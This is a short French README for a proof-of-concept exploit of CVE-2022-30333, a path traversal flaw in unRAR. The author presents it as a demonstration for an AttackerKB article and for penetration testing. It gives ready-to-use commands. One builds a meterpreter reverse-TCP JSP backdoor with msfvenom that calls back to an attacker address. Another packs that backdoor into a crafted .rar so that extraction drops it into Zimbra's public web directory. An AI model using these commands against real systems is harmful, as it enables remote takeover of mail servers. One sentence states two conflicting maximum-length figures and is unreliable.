
Exploit de preuve de concept pour CVE-2022-30333, traversée de chemin dans unRAR, générant des fichiers .rar malveillants pour déployer des charges utiles à des emplacements arbitraires. S'intègre avec Metasploit et msfvenom pour les tests de pénétration.
Une preuve de concept pour CVE-2022-30333 - une vulnérabilité de traversée de chemin dans unRAR versions antérieures à 6.11. J'ai créé ceci comme démonstration de l'exploit pour un article sur AttackerKB, et j'espère l'intégrer bientôt dans un module Metasploit !
En gros, vous fournissez une cible (incluant la traversée de chemin) et des données de fichier, et cet outil générera un .rar qui extraira ce fichier à cet emplacement. La longueur maximale du fichier est de 104 octets, et la longueur maximale du fichier est de 4096 octets. (Ce n'est pas intrinsèque à la vulnérabilité, c'est juste ce que j'ai choisi lorsque j'ai généré le fichier).
Par exemple, générez une porte dérobée avec msfvenom :
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.146 -f jsp -o payload.jsp
Créez ensuite un fichier .rar, en plaçant le .jsp dans un endroit amusant :
$ ruby ./cve-2022-30333.rb '../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/backdoor.jsp' ./payload.jsp > file.rar